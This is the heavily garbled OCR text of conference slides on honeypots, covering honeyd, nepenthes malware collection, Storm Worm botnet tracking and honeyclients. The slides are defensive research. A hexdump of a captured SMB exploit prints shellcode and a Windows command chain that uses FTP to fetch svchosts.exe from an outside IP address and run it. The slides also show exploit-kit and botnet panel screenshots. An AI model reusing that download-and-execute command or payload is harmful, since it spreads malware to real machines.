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• Honeypot 101 

• Examples 

• honeyd 

• nepenthes 

• Honeyclients 

• Conclusion 
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Honeypots 


• Network-based measurements often 
show us only the results of attacks 

• Scanning activity caused by worms 

• Spam sent via botnets 


• How to learn more about the attackers? | 


• “A honeypot is an information system 
resource whose value lies in unauthorized 
or illicit use of that resource ” 

Know Your Enemy 
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Honey pots 

High-interaction 

Lo w - i n t e rac t i o n 

Real services, OS’s, or 
applications 

Emulation of TCP/IP stack, 
vulnerabilities, ... 

Higher risk 

Lower risk 

Hard to deploy / maintain 

Easy to deploy / maintain 

Capture extensive amount 
of information 

Capture quantitative 
information about attacks 

Example: Gen III honeynets 

Examples: honeyd, 
nepenthes, labrea, ... 

UNIVERSITAT 
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honeyd 


• Low- interaction honeypot written by Niels Provos 

• Available at http://honeyd.org 

• Virtualization of TCP/IP stack 

• Fool tools like nmap & xprobe 

• Complex setups possible 

• Latency, packets loss, bandwith, ... 

• Can emulate complex network setups 
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honeyd 
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Malware Collection 


• Hundreds of new malware samples each month 

• How to learn more about malware? 

• Quantitative information 

• Qualitative information 

• Information about new malware 

• Usage of honeypot-based techniques 

• Use deception & emulation 
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nepenthes 


• Tool to automatically “collect” malware like bots 
and other autonomous spreading malware 

• Emulate known vulnerabilities and download 
malware trying to exploit these vulnerabilities 

• Available at http://nepenthes.mwcollect.org 
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Schematic Overview 
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Vulnerability modules 


• Emulate vulnerable services 



Play with exploits until they send us 
their payload (finite state machine) 

Currently more than 20 available 
vulnerability modules 

• More in development 

Analysis of known vulnerabilities & 
exploits necessary 


• Automation possible? 
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Shellcode modules 


shellcode- 

generic 



shellemu 

winnt 


shellcode- 

signatures 


Automatically extract URL used by 
malware to transfer itself to 
compromised machine 


• Generic XOR decoder 


sch generic createprocess 


• sch_generic_url 

• sch_generic_cmd 
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[ dia 

] 

— 

— 

— 

— 

---[ hexdump(0xlbf7bb68 , 

0x000010c3) 

]- 

— 

— 


[ dia 

: 

0X0000 

00 

00 

10 

bf 

ff 

53 

4d 

4Z 

73 

00 

00 

00 

00 

18 

07 

c8 

SMB 

s 


[ dia 

: 

0X0010 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

00 

37 

13 


7. 


[ dia 

: 

0X00Z0 

00 

00 

00 

00 

0c 

ff 

00 

00 

00 

04 

11 

0a 

00 

00 

00 

00 



c 

[ dia 

: 

0x0030 

00 

00 

00 

7e 

10 

00 

00 

00 

00 

d4 

00 

00 

80 

7e 

10 

60 

• • • • • • • 

V 

/N/ 

o 

[ dia 
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0x0040 

82 

10 

7a 

06 

06 

2b 

06 

01 

05 

05 

02 

a0 

82 

10 

6e 

30 

. .Z. . 

n0 


[ dia 

: 

0x0050 

82 

10 

6a 

al 

82 

10 

66 

23 

82 

10 

62 

03 

82 

04 

01 

00 

. . j . . . f # 

b 

• • L/ • • • • • 

u 

£ 

[ dia 
[...] 

: 

0x0060 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAA 

AAAAAAAA 

CD 

[ dia 

: 

0x0450 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

41 

AAAAAAAA 

AAAAAAAA 

"5 

[ dia 

: 

0x0460 

03 

00 

23 

82 

0c 

57 

03 

82 

04 

0a 

00 

90 

4Z 

90 

4Z 

90 

. .#. .W. . 

. . . . B . B . 

to 

[ dia 

: 

0x0470 

4Z 

90 

4Z 

81 

c4 

54 

f2 

ff 

ff 

fc 

e8 

46 

00 

00 

00 

8b 

B . B . . T . . 

• • • F • • • • 

to 

<D 

[ dia 

: 

0x0480 

45 

3c 

8b 

7c 

05 

78 

01 

ef 

8b 

4f 

18 

8b 

5f 

20 

01 

eb 

E<. 1 .x. . 

. 0 . ._ . . 

u 

U 

3 

[ dia 

: 

0x0490 

e3 

2e 

49 

8b 

34 

8b 

01 

ee 

31 

C0 

99 

ac 

84 

C0 

74 

07 

. .1.4. . . 

1 t. 

[ dia 

: 

0x04a0 

Cl 

ca 

0d 

01 

cZ 

eb 

f4 

3b 

54 

Z4 

04 

75 

e3 

8b 

5f 

Z4 

9 

T$.u. ._$ 

to 

[ dia 

: 

0x04b0 

01 

eb 

66 

8b 

0c 

4b 

8b 

5f 

lc 

01 

eb 

8b 

lc 

8b 

01 

eb 

. .f. . K._ 


CD 

[ dia 

: 

0x04c0 

89 

5c 

Z4 

04 

c3 

31 

C0 

64 

8b 

40 

30 

85 

C0 

78 

0f 

8b 

.\$. .l.d 

. @0 . . x . . 

j-J 

[ dia 

: 

0x04d0 

40 

0C 

8b 

70 

lc 

ad 

8b 

68 

08 

e9 

0b 

00 

00 

00 

8b 

40 

.p. . .h 

@ 


[ dia 

: 

0x04e0 

34 

05 

7c 

00 

00 

00 

8b 

68 

3c 

5f 

31 

f6 

60 

56 

eb 

0d 

4 . 1 .... h 

<_1.'V. . 

"O 

CD 

[ dia 

: 

0x04f0 

68 

ef 

ce 

e0 

60 

68 

98 

fe 

8a 

0e 

57 

ff 

e7 

e8 

ee 

ff 

h. . . 'h. . 

. .w 

> 

[ dia 

: 

0x0500 

ff 

ff 

63 

6d 

64 

20 

2f 

63 

20 

65 

63 

68 

6f 

20 

6f 

70 

. . cmd /c 

echo op 

CD 

(j 

[ dia 

: 

0x0510 

65 

6e 

20 

38 

34 

2e 

31 

37 

38 

2e 

35 

34 

2e 

32 

33 

39 

en 84.17 

8.54.239 

CD 

[ dia 

: 

0X05Z0 

20 

36 

32 

30 

31 

20 

3e 

3e 

20 

69 

69 

20 

26 

65 

63 

68 

6201 » 

ii &ech 

1 1 

[ dia 

: 

0x0530 

6f 

20 

75 

73 

65 

7Z 

20 

61 

20 

61 

20 

3e 

3e 

20 

69 

69 

o user a 

a » ii 

u 

[ dia 

: 

0x0540 

20 

26 

65 

63 

68 

6f 

20 

62 

69 

6e 

61 

7Z 

79 

20 

3e 

3e 

&echo b 

inary » 

_o 

[ dia 

: 

0x0550 

20 

69 

69 

20 

26 

65 

63 

68 

6f 

20 

67 

65 

74 

20 

73 

76 

ii &ech 

o get sv 


[ dia 

: 

0x0560 

63 

68 

6f 

73 

74 

73 

2e 

65 

78 

65 

20 

3e 

3e 

20 

69 

69 

chosts.e 

xe » ii 

Q_ 

[ dia 

: 

0x0570 

20 

26 

65 

63 

68 

6f 

20 

62 

79 

65 

20 

3e 

3e 

20 

69 

69 

&echo b 

ye » ii 


[ dia 

: 

0x0580 

20 

26 

66 

74 

70 

20 

2d 

6e 

20 

2d 

76 

20 

2d 

73 

3a 

69 

&ftp -n 

-v -s:i 


[ dia 

: 

0x0590 

69 

20 

26 

64 

65 

6c 

20 

69 

69 

20 

26 

73 

76 

63 

68 

6f 

i &del i 

i &svcho 


[ dia 

: 

0x05a0 

73 

74 

73 

2e 

65 

78 

65 

0d 

0a 

00 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

sts.exe. 

. . BBBBBB 


[ dia 

: 

0x05b0 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

4Z 

BBBBBBBB 

BBBBBBBB 
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U 
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to 
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U 

CD 
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dia 
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dia 
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] 


] 


] 


] 


] 


] 


] 


0x0000 

0x0010 

0X00Z0 

0x0030 

0x0040 

0x0050 

0x0060 
















































0x0540 

0x0550 

0x0560 

0x0570 

0x0580 

0x0590 

0x05a0 

0x05b0 


00 00 
00 00 
00 00 
00 00 
82 10 
82 10 
41 41 


[ hexdump(0xlbf7bb68 , 

10 bf ff 55 4d 42 75 00 00 

00 00 00 00 00 00 
00 00 0c ff 00 00 
00 7e 10 00 00 00 
7a 06 06 2b 06 01 
6a al 82 10 66 25 
41 41 41 41 41 41 


00 00 00 
00 04 11 
00 d4 00 
05 05 02 
82 10 62 
41 41 41 


0x000010c5) ]- 
00 00 18 07 c8 
00 00 00 57 15 
0a 00 00 00 00 
00 80 7e 10 60 
a0 82 10 6e 50 
05 82 04 01 00 
41 41 41 41 41 


SMB s 




20 26 
20 69 
65 68 
20 26 
20 26 
69 20 
75 74 
42 42 


65 65 
69 20 
6f 75 

65 65 

66 74 
26 64 
75 2e 
42 42 


68 6f 
26 65 
74 75 
68 6f 
70 20 
65 6c 
65 78 
42 42 


20 62 
65 68 
2e 65 
20 62 
2d 6e 
20 69 
65 0d 
42 42 


69 6e 
6f 20 

78 65 

79 65 
20 2d 
69 20 
0a 00 
42 42 


61 72 
67 65 
20 5e 
20 5e 
76 20 
26 75 
42 42 
42 42 


79 20 
74 20 
5e 20 
5e 20 
2d 75 
76 65 
42 42 
42 42 


5e 5e 
75 76 
69 69 
69 69 
5a 69 
68 6f 
42 42 
42 42 


7. 


z. .+ 


n0 


-j fit h 

• • ■•••I// •• L/ • • • • • 

AAAAAAAA AAAAAAAA 


and /c 
echo 

open 84.178.54.239 

» 

• • 
ii 

ft 

& 

j 

echo 

user a a 

» 

• • 
ii 

& 

echo 

binary 

» 

• • 
ii 

& 

j 

echo 

get svchosts.exe 

» 

• • 
ii 

& 

echo 

bye 

» 

• • 
ii 

& 

ftp -n -v -s:ii 
del ii 

) 

svchosts.exe 

\ ... . . 



& 

o 1 
“ E 

E 

. . . . C 


.W. 
.T. 
.x. 
4. . 


AAAAAAAA 
. B . B . 
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• • • > 

. K._ 

.l.d 


.0 

1. 

T$ 


• • • L • 
u. ._$ 


• ••••• 


. @0 . . X 


. . .h 
'h. . 


<_1.'V 
. .W. . . 


@ 


01 » 


&echo b 
ii &ech 
chosts.e 
&echo b 
&ftp -n 
i &del i 
sts.exe. 
BBBBBBBB 


echo op 
8.54.Z39 
ii &ech 
a » ii 
inary » 

0 get sv 
xe » ii 
ye » ii 

-v -s:i 

1 &svcho 
. . BBBBBB 
BBBBBBBB 



o 
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4-J 


E 

<u 


tO 

to 

CD 

U 

U 


to 


CD 


a> 

> 


CD 

U 

CD 

L- 


n 

O 


CL 
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[ 

[ 

[ 
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] 


] 


] 


] 


] 


] 


] 


0x0000 

0x0010 

0X00Z0 

0x0030 

0x0040 

0x0050 

0x0060 



] 



00 00 
00 00 
00 00 
00 00 
8Z 10 
8Z 10 
41 41 


[ hexdump(0xlbf7bb68 , 

10 bf ff 53 4d 4Z 73 00 00 
00 00 00 00 00 00 
00 00 0c ff 00 00 
00 7e 10 00 00 00 
7a 06 06 Zb 06 01 
6a al 8Z 10 66 Z3 
41 41 41 41 41 41 


00 00 00 
00 04 11 
00 d4 00 
05 05 0Z 
8Z 10 6Z 
41 41 41 


0x000010c3) ] = 

00 00 18 07 c8 SMB s 

00 00 00 37 13 7. 

0a 00 00 00 00 

00 80 7e 10 60 . . . ~ ~ . 

a0 8Z 10 6e 30 ..z.. + n0 

03 8Z 04 01 00 . . j. . .f# . .b 

41 41 41 41 41 AAAAAAAA AAAAAAAA 


and /c 
echo 

open 84.178.54.239 

» 

• • 
ii 

& 

j 

echo 

user a a 

» 

• • 
ii 

& 

echo 

binary 

» 

• • 
ii 

& 

j 

echo 

get svchosts.exe 

» 

• • 
ii 

& 

echo 

bye 

» 

• • 
ii 

& 

ftp -n -v -s:ii 
del ii 

) 

svchosts.exe 



& 

o 1 
“ E 

E 

. . . . c 


.W. 
.T. 
.x. 
4. . 


AAAAAAAA 
. B . B . 
F 


• • • 


.0 

1. 

T$ 


. K._ 
.l.d 


• • • L • 
u. ._$ 


• ••••• 


. @0 . . X 


. . .h 
'h. . 


<_1.'V 
. .W. . . 


@ 


]0x ft P ://a:a@84. 1 78.54.239/svchosts 


] 0x0580 
] 0x0590 
] 0x05a0 
] 0x05b0 


Z0 Z6 66 74 70 Z0 Zd 6e 
69 Z0 Z6 64 65 6c Z0 69 
73 74 73 Ze 65 78 65 0d 
4Z 4Z 4Z 4Z 4Z 4Z 4Z 4Z 


Z0 Zd 76 Z0 Zd 73 3a 69 
69 Z0 Z6 73 76 63 68 6f 
0a 00 4Z 4Z 4Z 4Z 4Z 4Z 
4Z 4Z 4Z 4Z 4Z 4Z 4Z 4Z 


&ftp -n 
i &del i 
sts.exe. 
BBBBBBBB 


echo op 
8.54.Z39 
ii &ech 
a » ii 
inary » 

0 get sv 
xe » ii 
ye » ii 

-v -s:i 

1 &svcho 
. . BBBBBB 
BBBBBBBB 




Download modules 



download- {http , tf tp} 

• Handles HTTP / TFTP URIs 
download- ftp 

• FTP client from Windows is not 
RFC compliant... 

download-{csend, creceive} 
download- link 

• links //10.0.0.1/HJ4G== 


Thorsten Holz • Laboratory for Dependable Distributed Systems 


Troopers 2008 


UNIVERSITAT 

MANNHEIM 



Submission modules 



submit-f ile 

• Write file to hard disk 

submit- {mysql , postgres , mssql} 

• Store file in database 
submit-norman 

• Submit file to sandboxes for analysis 
submit-http 

• Send file via HTTP POST 
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CWSandbox 



CWSandbox Webinterface v2 

© +i7T https: //cwsandbox. org/?page=details&id = 186698&password=ncmop 


© * Qj Google 



CWSandbox 

Webinterface 


Live Food 


Statistics 


Malware 


Search 


Submit 


Logout 


Admin 


0 


Analysis Details 

XML (Popup) - TXT (Popup) - HTML (Popup) - Download Sample - Download CAB - Browse CAB - Download PCAP - Reset Analysis 
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Statistics: nepenthes 


• Eight weeks (December , 06/January , 07) 
nepenthes on ~8,000 IP addresses on one 
physical machine: 

• 1 3,000,000+ files downloaded 

• 2,600+ unique binaries based on md5sum 


• ~300 different botnets 



AV 1 

AV 2 

AV 3 

AV4 

Complete set 
(2,634 samples) 

92.5 

86.9 

79.7 

73.8 


• One bot variant dominates the collection 
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Statistics 


16.92 


RntiVir top naluare 


25.22 


15.22 



□ Worm/Korgo 

■ W32/Parite 

□ GoBot 

□ PadoBot 

□ Doomber 

■ W32/V i rut 

□ RBot 

□ SDBot 

D Zapchast 

□ Sasser 


14.52 


9.12 


BitDefender top naluare 

51.32 


15.02 



□ Worm/Korgo 

■ SDBot 

□ GoBot 

I Zapchast 

□ GhostBot 

■ PadoBot 

□ RBot 

□ Sasser 

□ W32/Parite 

□ PoeBot 


14.42 


Sophos top naluare 


34.72 


ClanRV top naluare 

51.22 


26.12 



□ GoBot 
■ Korgo 

□ W32/Parite 

□ U32, i rut 

□ RBot 

□ Sasser 

□ Blaster 

□ PoeBot 

□ Dabber 

□ SDBot 


21.82 


18.12 



□ PadoBot 

■ GoBot 

□ Korgo 

□ SDBot 

□ IRCBot 

■ hyBot 

□ GhostBot 

□ W32/Parite 

□ Sasser 

□ PoeBot 


9.32 


8.82 
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Tracking Botnets 


• Learning more about botnets with honeypots 

1 . Collect samples with honeypots 

2. Automated analysis, e.g., cwsandbox.org 

3. Join botnet and observe from inside 

• “Know Your Enemy: Tracking Botnets” 

• LEET’08: “Measurements and Mitigation of P2P- 
based Botnets: A Case Study on Storm Worm” 
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Spam mails sent by one infected 
Storm machine over several days 
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nnn 


P> http://74.13e.ll.91/ 


Dancing Skeleton 


* <V Google 




Inside Storm 



• Network-level behavior 

• First versions: Overnet (Kademlia-based DHT) 

• Obfuscation was added in October 2007 

• Called Stormnet in the following 

• Seems to change from DHT to linked list 

• Only bots present in Stormnet 
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Inside Storm 



• Bot communication (simplified, valid for Overnet) 

• Infected machine searches for specific keys 
within the network 


• Botmaster knows in advance which keys are 
searched for => publishes commands there 



Honeypot 



modified firewall 
"Truman Box" 



Internet 
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Modes 


Two different modes: NAT or public IP address 


Spam/DoS- 

Bots 


Gateways 


Controller 
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Actually Storm Worm is hybrid network 
with P2P component for lookup 
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Results 




Diurnal pattern in Stormnet size 
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Results 
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Number of bots in Stormnet, split by geo-location 
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Hone/clients 

Tracking New Attack Vectors 



Malicious Websites 


• More and more attacks against browsers 

• Operating systems get better and better 

• Applications become weakest link in chain 

• Drive-by download to install malware 

• Malicious website sends several exploits to 
visitor (typically encoded, not easy to detect) 

• If one exploit is successful, malware is installed 
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Malicious Websites 


• Social engineering is also common 

• Trick user into downloading executable 

• Often related to greeting cards or adult content 

• Examples: Storm Worm and Zlob 

• Malicious results in search engines 

• Attackers place sites within Google’s search 
index => requests return these malicious sites 

• ~ I -2 % of search results are malicious 
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Malicious Websites 


• Analyzed several billion 
URLs and executed an 
in-depth analysis of 
4.5M URLs 

• Found 450.000 
malicious sites 
downloading a binary 

to honeypot, 700.000 
additional malicious 
sites 


Web Page 
Repository 



MapReduce 

Heuristical URL Extraction 


/ \ 

URL 

f 

Virtual Machine 

* 



r Internet \ 


Monitor 

\Exph orer J 

v * 

Execution Analysis 


Result 


Malicious Page 
Reoositorv 



Provos et al.,“The Ghost in the Browser: Analysis of Web-based Malware” - HotBots’07 
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Social Engineering 


Download details: Security Update for Windows XP (KB92381D) 


■ 


/5ecurityupdate/index.php?q=aHRQcDovL3d3dy5taWNvb3NvZnQuY29 " Or Coogle 



Download -Center Home 


Product Families 
W indows 
Office 
Servers 

Business Solutions 
Developer T ools 
Windows Live 
MSN 

Gam es & Xbox 
Windows Mobile 
All Downloads 


Download Categories 

Games 

DirectX 

Internet 

Windows Security Bt Updates 
Windows Media 
D rivers 

Home S: Office 

Mobile Devices 

Mac & Other Platforms 

System Tools 

D eveioo m ent Resou rces 


Download Resources 

Microsoft Update Services 
Download Center Help 
Related Sites 


Download Notifications 

Notifications Signup 


Search Ail Downloads 


V 


Go Advanced Search 


Security Update for Windows XP (KB923810) - English 


Brief Description 
On This Page 

4 , Quick Details 
0 - System Requirements 
4 , Addjtionaj tirformation 
4, What Others Are Downloading 


Over view 
Instr uctions 
Related Resources 


Quick Details 

File Name: 

Version : 

Security Bulletins: 

Knowledge Base (KB) Articles: 
Date Published: 

Language : 

Download Size: 

Estimated Download Time: 

Change Language: 


WindowsXP-KB923B10-xB6-ENU exe 

923810 

MS07-055 

KB92381C 

10/8/2007 

English 

989 KB 

3 min 56K 


f 


English 


i ' Change 


Microsoft Update 

Scan your computer 
for Windows and 

. y Office updates that 

you need 






Social Engineering 
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Ffc E* toew y IchA Hft 
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Lil 


V 

► (E3* 

— 

A 


dvd access 



INSTALL ACCESS SOFTWARE 


Software dial allows video access 

Ip mij^ iZ'ii idnnl m' dpti^. 


DVDaccess is a muttlnneiiifl su'Vare Inal allows access lo Windows 
eallacUofi of multimedia drivers and Integrates wttti any application 
usIrq DlreelStiowand Microsoft Video Tar Wjndows. DVDaccess will 
lilghlr Increase quality ofvlifeo files you plary 


Teems ul use Cumacr 


DVDaccess enhances your music listening eipesienie by Imprawng 
the sound quality olAdeD files sound. ’iP3 J ntemel radio, Windows 
Media and other music files R enew stereo deplfo add 3D surrour d 
sound, reside sound clsiity.Poustyour audio lere^s, and produce 
deeo. rich Pass sounds 
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Backends 





Bot traffic Statistics for 


generated on 2007/11/14 


Top LO Coy n res { see aif] 


Top 10 new coy n res today 


Top 10 Coy ntres order by bet's reports 


Country 

Rating 

$ 1 = United 
— States 

15132 99% 

|'| Mexico 

29 

0% 

^ Spain 

27 

0% 

h lra*l 

23 

0% 

*•“ Korea 

23 

6% 

^ United 
* Kingdomi 

15 

0% 

Q Saudi Arabia 

12 

Q'% 

|*| Canada 

12 

0% 

• Japan 

8 

6% 

H Germany 

7 

0% 

H Roland 

6 

6% 

H Russia 

5 

0% 

m Thailand 

5 

6% 

9 Taiwan 

5 

0% 

Q Brazil 

5 

0% 

Q China 

5 

0% 

1 1 France 

4 

6% 

^ Puerto Rico 

4 

0% 

- Argentina 

4 

6% 

J Honduras 

3 

0% 

Totally: 37 




Country 

Rating 

_J United States 

2372 99% 

|'| Mexico 

7 

0% 

H Germany 

4 

0% 

H Colombia 

3 

0% 

^2 Spain 

3 

0% 

*•* Korea 

3 

0% 

Q Saudi Arabia 

2 

8 % 

iH Australia 

2 

0% 

|+1 Canada 

2 

0% 

— Iraq 

2 

0% 

totaly: 2407 




Top 10 bot versons 


Bot 

vers Ic n 

Rating 

^ 3.6.14 

15549 100% 

def . 

8 0% 

Totally: 2 



Country 

Rating 

1 United States 

90831 

99% 

|'| Mexico 

197 

0% 

” Spair 

167 

0% 

t+C Korea 

115 

0% 

Brazil 

106 

0% 

|*| Canada 

103 

0% 

jj; United Kingdom! 

92 

0% 

™ Thailand 

89 

0% 

Honduras 

56 

0% 

^ Iraq 

52 

0% 

Totally bet's reports: 

92177 



Bot's court: 15555 


Su marize 


Today new bots:4483 
All New bot today :24Q7 


Today Bot reports: 5470 






Backends 


MPack 


C + 'http 


nn.php 


* Q,» Coogle 


Saner time/date snapshot: 9- Sep- 2007 00:11:13 


MPack v0.90 stats 


Attacked hosts (total - unlq) 

IE XP ALL 

14291 - 13069 

QUihUw 

3478 - 3061 

Win 2000 

449 - 404 

Firefdx 

1643 - 1622 

Opera7 

44-38 


Traffic (total - unlq) 


Total trafT 

17720 • 16119 

Exploited 

7161 - 2938 

Loads count 

m 

Loader's response 

0% - 0% 

Efficiency 0% - 0% 


Modules state 

Statistic type 

MySQL- based 

User blocking 

OM 

Country Moddng 

OFF 


Country Traff jj Loads 

Efficiency 1 

SlL- Israel 

8140 

45.9% 

0 

0% 

0% 

t== US - United states 

2695 

15.2% 

0 

0% 

0% 

f - RU - Russian federation 

1956 

11% 

0 

0% 

0% 

L* XX - Unknown country 

1000 

5.6% 

0 

0% 

0% 

1™ ES - Spain 

825 

4.7% 

0 

0% 

0% 

ID CA - Canada 

317 

1.8% 

0 

0% 

0% 

Lj DE - Germany 

277 

1.6% 

0 

0% 

0% 

l£j TR - Turkey 

275 

1.6% 

0 

0% 

0% 

■ UA - Ukraine 

197 

1.1% 

0 

0% 

0% 

C GB - United kingdom 

186 

1% 

0 

0% 

0% 

A2 - Satellite provider 

183 

1% 

0 

0% 

0% 

— 

ID MX - Mexico 

145 

0.8% 

0 

0% 

0% 

II FR - France 

73 

0.4% 

0 

0% 

0% 

^ PL - Poland 

66 

0.4% 

A 

0% 
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Honeyclients 


• Automatically search for malicious websites 

• Simulate browsing behavior 

• Closely observe system and detect anomalies 

• HoneyMonkey (NDSS’06), Capture-HPC, 
HoneyC, HoneyClient, phoneyc, ... 

• Can be generalized to learn more about attacks 
against all kinds of client applications 

• User simulation needed? 
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Honeyclients 


• Capture-HPC ( https://projects.honeynet.org/ 
capture-hpc ) 

• Client/Server model 

• Analyze website with IE or other browser 
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Honeyclients 


• Capture-HPC ( https://projects.honeynet.org/ 
capture-hpc ) 


• Client/Server model 


• Analyze website with IE or other browser 


"24.03.2008 05:27 :44" , "visiting" , "http://adv.gratuito.st" , "iexplore" , "10" 
"24 . 03 . 2008 05:28: 35" , "errorO : NETW0RK_ERR0R-2 148270085" , 

"http: //adv.gratuito . st" , "iexplore" , "10" 

"24.03.2008 05:29:35" , "visiting" , "http://adview.ppro.de" , "iexplore" , "10" 
"24 . 03 . 2008 05:30: 33" , "errorO : NETW0RK_ERR0R-404 " , 

"http: //adview.ppro .de" , "iexplore" , "10" 

"24. 03 . 2008 05:31: 29" , "visiting" , "http : //adv. imho . se" , "iexplore" , " 10" 

"24 . 03 . 2008 05:32: 04" , "errorO : NETW0RK_ERR0R-2 148270085" , 

"http: //adv. imho . se" , "iexplore" , "10" 

"24. 03 . 2008 11:55:00", "visiting" , "http : //ai .hitbox . com" , "iexplore" , " 10" 
"24 . 03 . 2008 11:56:00", "visited" , "http : //ai .hitbox . com" , "iexplore" , " 10" 

"24 . 03 . 2008 11:57:15", "visiting" , "http : //aimphuck. com" , "iexplore" , " 10" 
"24. 03 . 2008 11:58: 45" , "visited" , "http : //aimphuck. com" , "iexplore" , " 10" 
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Honeyclients 


• Capture-HPC ( https://projects.honeynet.org/ 
capture-hpc ) 

• Client/Server model 

• Analyze website with IE or other browser 


"file" , "24/3/2008 20:37: 56 .717" , 

"C: \Programme\Internet Explorer\iexplore . exe" , "Write" , "C: \syst . exe" 
"file" , "24/3/2008 20:37:56. 702" , 

"System" , "Write" , "C : \WINDOWS\Temp\dnlsvc . exe" 

"file " , "24/3/2008 20:37:57. 452" , 

"System" , "Write" , "C : \syst . exe" 

"process" , "24/3/2008 20:37:57. 733" , 

"C: \Programme\Internet Explorer\iexplore . exe" , "created" , "C: \syst . exe" 


Thorsten Holz • Laboratory for Dependable Distributed Systems 


Troopers 2008 


UNIVERSITAT 

MANNHEIM 




Conclusion 


• Current honeypots are good at finding known 
attacks / automated attacks 

• We can detect worms, botnets, and other 
automated threats 

• Finding “0-day” / targeted attacks is harder 

• Why should an attacker waste his 0-day on my 
honeypot? 

• How to trick a clever attacker? 
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Thorsten Holz 

http://pi I .informatik.uni-mannheim.de/ 
thorsten.holz@informatik.uni-mannheim.de 


More information: 
http://honeyblog.org 
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▼▼ 


"Virtual Honeypots is the best reference for honeypots today. Security experts 
Niels Provos and Thorsten Holz cover a large breadth of cutting-edge topics, 
from low-interaction honeypots to botnets and malware. If you want to learn 
about the latest types of honeypots, how they work and what they can do 
for you, this is the resource you need." 

— Lance Spitzner, Founder, Honeynet Project 
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